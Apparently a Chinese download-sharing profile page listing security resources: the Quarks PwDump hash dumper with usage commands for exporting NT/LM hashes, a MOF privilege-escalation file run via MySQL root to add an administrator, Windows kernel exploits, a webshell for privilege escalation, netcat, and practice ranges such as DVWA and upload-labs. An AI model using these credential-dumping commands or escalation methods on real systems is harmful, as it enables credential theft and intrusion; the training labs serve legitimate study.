先看简介 Quarks PwDump是一个Win32环境下系统授权信息导出工具,目前除此之外还木有没有任何一款工具可以导出如此全面的信息,支持这么多的OS版本,(包括xP/2003/Vista/7/2008/8),经测试相当稳定。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。 源地址在这:http://code.google.com/p/quarkspwdump/ 可以导出 : - Local accounts NT/LM hashes + history 本地NT/LM哈希+历史登录记录 - Domain accounts NT/LM hashes + history 域中NT/LM哈希+历史登录记录 - Cached domain password 缓存里的域密码 - Bitlocker recovery information (recovery passwords & key packages) 使用了Bitlocker的恢复信息(恢复密码&关键包) 用法参考说明如下: quarks-pwdump.exe Options :参数 –dump-hash-local /*Dump出本机HASH*/ -dump-hash-domain-cached /*Dump出域内缓存的Hash*/ -dump-hash-domain (NTDS_FILE must be specified) /*Dump出域内的Hash,NTDS_FILE必须被指定*/ –dump-bitlocker (NTDS_FILE must be specified) /*Dump出BitLocker遗留信息*/ –with-history (optional) -output-type JOHN/LC (optional, if no=>JOHN) /*导出为Lc4或John The Ripper支持的格式*/ –output FILE (optional, if no=>stdout) /*导出结果到文件*/ 木有其他系统 请大家另行测试。 如需导出可以 C:\>quarkspwdump --dump-hash-local --output c:\xxxxx C:\>quarkspwdump --dump-hash-local --output-type LC --output c:\xxxxx

2020-03-16

mof提权文件nullevt.mof

mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp.exe编译执行。

2020-03-12

nc端口监听工具瑞士军刀

什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速                                                                                                                                                                                                                         nc的控制参数不少,常用的几个参数如下所列: 1) -l 用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。 2) -p 暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数) 3) -s  指定发送数据的源IP地址,适用于多网卡机  4) -u  指定nc使用UDP协议,默认为TCP 5) -v 输出交互或出错信息,新手调试时尤为有用 6)-w 超时秒数,后面跟数字  7)-z 表示zero,表示扫描时不发送任何数据       前期准备 准备两台机器,用于测试nc命令的用法 主机A:ip地址 10.0.1.161 主机B:ip地址 10.0.1.162   两台机器先安装nc和nmap的包 yum install nc -y yum install nmap -y 如果提示如下-bash: nc: command not found 表示没安装nc的包 ———————————————— 版权声明:本文为CSDN博主「小毛毛2013」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/u012486730/article/details/82019996

2020-03-11

漏洞利用EXP windows-kernel-exploits-master.zip

本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。

2020-03-10

后渗透专用的提权大马

木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是控制端,另一个是被控制端。木马这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的特洛伊木马本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。木马病毒的产生严重危害着现代网络的安全运行。   小马体积小,容易隐藏,隐蔽性强。大马体积比较大,功能多,危害大。

2020-03-10

typecho.tar.gz

关于 名称的来历 Typecho 是由 type 和 echo 两个词合成的,来自于开发团队的头脑风暴。 Type,有打字的意思,博客这个东西,正是一个让我们通过打字,在网络上表达自己的平台。Echo,意思是回声、反馈、共鸣,也是PHP里最常见、最重要的函数,相信大部分PHP爱好者都是从 echo 'Hello,world!'; 开始自己的PHP编程之路的。 名称就表明 Typecho 是一款博客程序,它在 GPL version 2 许可证下发行,基于 PHP (需要 PHP5 以上版本)构建,可以运行在各种平台上,支持多种数据库(Mysql, PostgreSQL, SQLite)。 为什么开发 Typecho 源自开发团队在精神层面上的洁癖和狂热。在使用博客程序的大部分时间里,我们只是发几段文字,贴几张图片,不需要高级复杂的系统,需要的是一个简单快速的博客平台。在流行的开源程序中,满足我们要求的很少,于是我们决定自己动手,开发一款有性格的博客程序,并用开源协议发行。 开发团队中的几个人都是 IT 从业者,在成长的过程中从开源世界里获益匪浅,这个项目也是我们对开源的一个回报。 如何参与开发 Typecho Typecho 目前使用 Git 来控制程序版本,如果你想为 Typecho 贡献源代码,最好先弄明白 Git 的使用方法。我们目前把项目托管在 GitHub 上,任何 GitHub 用户都可以向我们贡献代码。 参与的方式很简单,【Fork】一份 Typecho 的代码到你的仓库中,修改后提交,并向我们发起【Pull Request】申请,我们会及你的申请并及时对代码进行审查。审查通过后,你的代码将被【Merge】进我们的仓库中,这样你就会自动出现在贡献者名单里了,非常方便。

2020-03-03

xss闯关小游戏.zip

这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载

2020-02-25

DVWA-安全测试靶场.zip

Web应用程序(DVWA)是一个PHP / MySQL的Web应用程序,它是该死的脆弱。 它的主要目标是成为一名安全专家援助法律环境中测试他们的技能和工具,帮助web开发人员更好地理解的过程确保web应用程序和帮助学生和老师了解web应用程序安全性控制教室环境。 DVWA的目的是 实践中一些最常见的web漏洞 , 不同程度的困难 ,用一个简单直观的界面。 一般的用法说明 它取决于用户如何DVWA方法。 要么通过每个模块工作在一个固定的水平,或选择任何模块和工作达到最高水平之前他们可以移动到下一个。 没有一个固定的对象完成一个模块; 但是用户觉得他们应该成功地利用了系统尽他们可能会利用这个漏洞。 请注意,有 记录和无证的弱点 用这个软件。 这是故意的。 你被鼓励尝试和发现尽可能多的问题。 DVWA还包括一个Web应用程序防火墙(WAF) PHPIDS,可以使在任何阶段进一步增加了困难。 这将演示如何添加另一层的安全可能会阻止某些恶意行为。 注意,还有各种各样的公共方法绕过这些保护(这可以被看作是一个扩展为更高级的用户)! 有一个帮助按钮在每个页面的底部,它允许您查看提示和技巧的脆弱性。 还有额外的链接进一步背景阅读,这涉及到安全问题。

2020-02-19

ewebeditor编辑器.rar

ACCESS数据库的后台管理编辑器 ======================================================================================================== eWebEditor ASP版,使用ACCESS配置数据库,带后台管理。为保证安全,强烈建议用户开始使用就修改后台管理用户及密码。 结构说明 ============================= admin : 后台管理相关图片 buttonimage : 按钮图片 css : 样式文件 db : 数据库文件 dialog : 对话框相关文件 example : 例子 include : 公用包含文件 sysimage : 系统图片 uploadfile : 默认的上传文件 安装=============================1、解开压缩包,直接拷贝到站点或建虚拟;2、访问例子文件,看是否运行正常: 1) eWebEditor 标准调用和弹窗调用示例: http://127.0.0.1/ewebeditor/example/test1.asp 2) eWebEditor 远程文件上传示例: http://127.0.0.1/ewebeditor/_example/test2.asp3、如果显示正常信息,即表示安装已完成! 使用=============================1、后台管理 地址:http://127.0.0.1/ewebeditor/admin_default.asp 默认登录用户:admin 默认登录密码:admin ======================================================================================================== ╭═══════════════╮ ║ ║ ╭══════┤ ├══════╮ ║ ║ 单机游戏网 ║ ║ ║ ║ ║ ║ ║ ╰═══════════════╯ ║ ║ ║ ║声明: ║ ║ 1) 本站不保证所提供软件或程序的完整性和安全性。 ║ ║ 2) 请在使用前查毒。 ║ ║ 4) 转载本站提供的资源请勿删除本说明文件。 ║ ║ 5) 本站提供的程序均为网上搜集,如果该程序涉及或侵害到您║ ║ 的版权请立即写信通知我们。 ║ ║ 6) 本站提供软件只可供研究使用,请在下载24小时内删除, ║ ║ 切勿用于商业用途,由此引起一切后果与本站无关。 ║ ║ ║ ║ 1. 推荐使用:WinRAR V3.2以上版本解压本站软件 ║ ║ ║ ║ ║ ║ ║ ║ ╭───────────────────────╮ ║ ╰══┤ ├══╯ ╰───────────────────────╯

2020-02-17

C32Asm_setup.zip

C32ASM静态反汇编工具功能概述 C32Asm现具有如下功能: 快速静态反汇编PE格式文件(Exe、Dll等) 提供Hex文件编辑功能,功能强大 提供内存Dump、内存编辑、PE文件Dump、PE内存ImageSize修正等多种实用功能 提供内存反汇编功能,提供汇编语句直接修改功能,免去OPCode的直接操作的繁琐 提供反汇编语句彩色语法功能,方便阅读分析,能方便自定义语法色彩 提供输入表、输出表、参考字符、跳转、调用、PE文件分析结果等显示 提供方便的跳转、调用目标地址的代码显示 提供汇编语句逐字节分析功能,有助于分析花指令等干扰代码 提供对ord调用和非ord调用的import自定义解析功能 提供PE文件格式的分析显示功能 提供文件拖放功能,直接可以进行文件反汇编或编辑 提供主文件命令行模式,方便加入右键菜单进行快速的文件操作 提供快速书签定位,多行代码复制,代码注释功能

2020-02-15

BurpSuite.zip

Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

2020-02-13

upload-labs-master.zip

简介 upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路。 3.实在没有思路时,可以点击查看提示。 4.如果黑盒情况下,实在做不出,可以点击查看源码。

2020-02-13

社会工程学_百度百科.pdf

这是对社会工程学的详细解答,它主要讲解了社会工程学的起源、主要内容、社工手段、防御手段四个方面并配有详细的解答

2020-02-06

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除